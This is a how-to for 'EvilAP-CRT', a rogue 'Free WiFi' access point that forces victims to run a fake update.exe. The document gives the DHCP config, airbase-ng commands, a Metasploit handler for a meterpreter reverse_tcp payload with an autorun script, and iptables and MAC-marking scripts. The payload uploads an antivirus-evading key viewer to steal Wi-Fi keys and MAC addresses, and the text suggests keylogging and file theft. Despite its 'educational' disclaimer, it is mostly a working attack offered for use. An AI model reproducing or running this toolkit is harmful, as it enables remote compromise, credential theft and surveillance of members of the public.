- EvilAP-CRT v1.0
- CRT stands for capture, release and transparency.
- Please note this is a proof of concept for educational purposes only; it is not to be used out in the wild.
- Victims cannot surf through EvilAP unless they download and execute our fake update:
- authorisation to use the fake AP is then done by MAC address, so anyone who does not run
- the fake update gets no further than the redirect page.
- Run ./evilapcrt.sh; make sure you give this file exec permission.
- mc2.sh and mc3.sh need exec permission too, and you need lighttpd installed (it serves the fake update page on port 80).
- So what does the script do?
- export fakeap_interface=wlan0 # our fake AP; wlan0 is put into monitor mode as mon0 later in the script
- export router=192.168.1.1 # the route to the internet, usually your router; it is needed as the upstream gateway
- export gateway_interface=eth0 # our access to the internet; it can be wireless too, but make sure it is connected first
- First we copy dhcpd.conf to its correct location. It looks like this:
- ddns-update-style ad-hoc; # accepted by dhcp3 with a warning; dhcpd 4.x refuses it, use "none" there
- default-lease-time 600;
- max-lease-time 7200;
- subnet 10.0.0.0 netmask 255.255.255.0 {
- option routers 10.0.0.1;
- option subnet-mask 255.255.255.0;
- option broadcast-address 10.0.0.255; # the broadcast address of 10.0.0.0/24 is .255, not .0
- option domain-name "example.com";
- option domain-name-servers 10.0.0.1;
- range dynamic-bootp 10.0.0.16 10.0.0.55;
- #range 10.0.0.20 10.0.0.50;
- }
- We then start our fake AP on wlan0:
- modprobe tun # airbase-ng creates its at0 tap interface through /dev/net/tun
- airmon-ng start $fakeap_interface # put wlan0 into monitor mode; the monitor interface appears as mon0
- FakeAP -e airbase-ng -e "Free WiFi" mon0 -v # started on mon0 with ESSID "Free WiFi"; extended features such as -P (respond to all probes) can be added here
- We start Metasploit with
- Metasploit -e ./msfconsole -r /root/WK2/hb.rc # let's have a look at hb.rc
- use exploit/multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp # matches the meterpreter reverse_tcp exe I created earlier and renamed to update.exe, which becomes our fake update
- set LHOST 10.0.0.1 # the at0 address; the victim connects back here on port 28
- set LPORT 28
- set AutoRunScript /root/WK2/hb2.rb # our autorun script, executed on every new session
- set ExitOnSession false # we don't want to exit after the first session; we want more victims
- show options
- exploit -j # run the handler as a background job
- Now let's look at hb2.rb. This is a long script, so I will cut it down to the relevant bits:
- bin = "wkv.exe" # wireless key viewer, modified to bypass AVs
- bin2 = "getmac1.exe" # the Windows getmac.exe utility, which prints the machine's MAC addresses
- bin3 = "getmac.bat" # a batch file I wrote that runs getmac1.exe and writes its output to the victim's system drive as macx.txt
- We then upload all three files and execute them: we grab the wireless keys and the victim's MAC address.
- The wireless keys are downloaded to the keys folder and the MAC address to the allowmac folder, each as a randomly named text file so nothing gets overwritten. I am skipping the technical detail; the bulk of the script is commented for those who are interested.
- iptables is then set up:
- echo "1">/proc/sys/net/ipv4/ip_forward # IP forwarding is essential, otherwise the victim cannot surf
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1800
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -F
- iptables -t mangle -F
- iptables -t nat -A POSTROUTING -s 10.0.0.0/24 -j MASQUERADE -o $gateway_interface
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $router # all UDP (DNS included) is sent on to the upstream router
- iptables -t nat -A PREROUTING -m mark --mark 0x42 -j ACCEPT # marked MACs get their traffic through untouched
- iptables -t filter -I FORWARD 1 -m mark --mark 0x42 -j ACCEPT # as above: marked MACs are allowed to forward
- iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j ACCEPT # intended for DNS; note it sits after the catch-all UDP DNAT above, so it is never reached
- iptables -t nat -A PREROUTING -i at0 -p tcp --dport 80 -j REDIRECT --to-port 80 # any unmarked MAC has its port 80 traffic redirected to our fake update page
- sleep 2
- /etc/init.d/dhcp3-server restart
- Please note this is a simple iptables setup. The marks are set in the mangle PREROUTING chain, which runs before nat PREROUTING, so a marked client skips the redirect. Only TCP port 80 is intercepted, though: FORWARD has no DROP rule, so unmarked clients can still reach other ports (443 for one). For protection block all ports except 80, 53 and 28 (our meterpreter port), and block access to your router at 192.168.1.1, or at least put a better password on it, otherwise you will end up with egg on your face. Newbies, use this at your own risk.
- We then execute mc2.sh and mc3.sh; both run in a loop.
- mc2.sh
- grep -h -E -o '[[:xdigit:]]{2}(-[[:xdigit:]]{2}){5}' /root/WK2/allowmac/* > /root/WK2/allowmac/mac.txt
- # here we extract the MACs by pattern into mac.txt, because getmac prints other data we don't need (the output file must be mac.txt, which is what mc3.sh reads)
- mc3.sh
- KNOWN_MACS=`cat /root/WK2/allowmac/mac.txt | awk '{print $1}'`
- for MAC in $KNOWN_MACS ; do iptables -t mangle -I PREROUTING -m mac --mac-source $MAC -j MARK --set-mark 0x42 ; done
- # once a victim has been exploited, his MAC address is in mac.txt; we mark that MAC so he can surf, and loop the script. Two caveats: every pass inserts the rules again, so the mangle chain fills with duplicates, and newer iptables only accepts colon-separated MACs while getmac prints dashes, so convert with tr '-' ':' before marking.
- Now our victim connects, is redirected to our fake update page, downloads update.exe and runs it; once hb2.rb has run we let him out to the internet while everyone else stays on the redirect.
- Removing a MAC from mac.txt does not revoke access, because the mark rule is already in the mangle chain. Delete that one rule (iptables -t mangle -D PREROUTING -m mac --mac-source $MAC -j MARK --set-mark 0x42) or flush the whole table with iptables -t mangle -F, which puts every client back onto the redirect.
- Finally we run other tools such as dsniff, urlsnarf etc. Here the possibilities are endless: you can go back to Metasploit, interact with any of the sessions created and dump some interesting stuff. meterpreter gives you keylogging too, as well as the ability to download doc, txt and jpg files to a folder.
- Remember to delete everything in the allowmac folder except mac.txt, and make sure mac.txt is empty when finished.
- That's all folks.